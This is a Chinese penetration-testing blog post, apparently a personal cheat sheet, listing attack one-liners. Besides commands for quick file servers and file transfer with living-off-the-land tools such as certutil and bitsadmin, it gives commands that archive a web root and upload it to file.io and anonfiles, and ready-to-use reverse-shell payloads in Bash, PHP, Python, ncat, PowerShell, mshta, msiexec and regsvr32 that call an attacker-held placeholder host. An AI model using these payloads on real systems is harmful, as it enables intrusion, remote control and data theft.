奇技淫巧


简单服务

FTP

python -m pyftpdlib -w

DNS

python -m dnslib.intercept

HTTP

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000

文件操作

写入文件

  • Bash
echo Base64 | base64 -d > File
  • Certutil
echo Base64 > Temp && certutil -f -decode Temp File
  • PowerShell
[IO.File]::WriteAllBytes('%TEMP%\File',[Convert]::FromBase64String('Base64'))

下载文件

  • Curl
curl -kL http://example.com/File -o File
  • Wget
wget --no-check-certificate http://example.com/File -O File
  • Certutil
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete
  • Bitsadmin
bitsadmin /transfer job http://example.com/File %TEMP%\File
  • PowerShell
(New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')

上传文件

  • Curl
tar -zcvf /tmp/File.tar.gz -P /var/www/html
curl -F "file=@/tmp/File.tar.gz" https://file.io > info.json
curl -F "file=@/tmp/File.tar.gz" https://api.anonfiles.com/upload > info.json

反弹Shell

PHP

php -r '$sock=fsockopen("x.x.x.x",yyyy); exec("/bin/bash -i <&3 >&3 2>&3");'

Bash

bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1

Ncat

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x yyyy > /tmp/f

Mshta

mshta http://x.x.x.x/shell.hta

Python

python -c 'import os, socket, subprocess; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("x.x.x.x", yyyy)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); subprocess.call(["/bin/bash", "-i"])'

Msiexec

msiexec /q /i http://x.x.x.x/shell.msi

Regsvr32

regsvr32 /s /n /u /i:http://x.x.x.x/shell.sct scrobj.dll

PowerShell

powershell -nop -c "$TCP = New-Object System.Net.Sockets.TCPClient('x.x.x.x', yyyy); $CMD = $TCP.GetStream(); [byte[]]$Bytes = 0..65535 | % { 0 }; while (($I = $CMD.Read($Bytes, 0, $Bytes.Length)) -ne 0) {$Send = [Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes, 0, $I) 2>&1 | Out-String) + (PWD).Path + '> '); $CMD.Write($Send, 0, $Send.Length); $CMD.Flush()}; $TCP.Close()"

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
痕迹清除 痕迹清除
╔═══════════════╗
║ “复制粘贴” 之痕迹清除 ║
╚═══════════════╝
2021-02-14
下一篇 
Kali Kali
Kali是一个渗透测试兼安全审计平台,集成了多款漏洞检测、目标识别和漏洞利用工具,在信息安全业界有着广泛的用途。
2020-09-03
  目录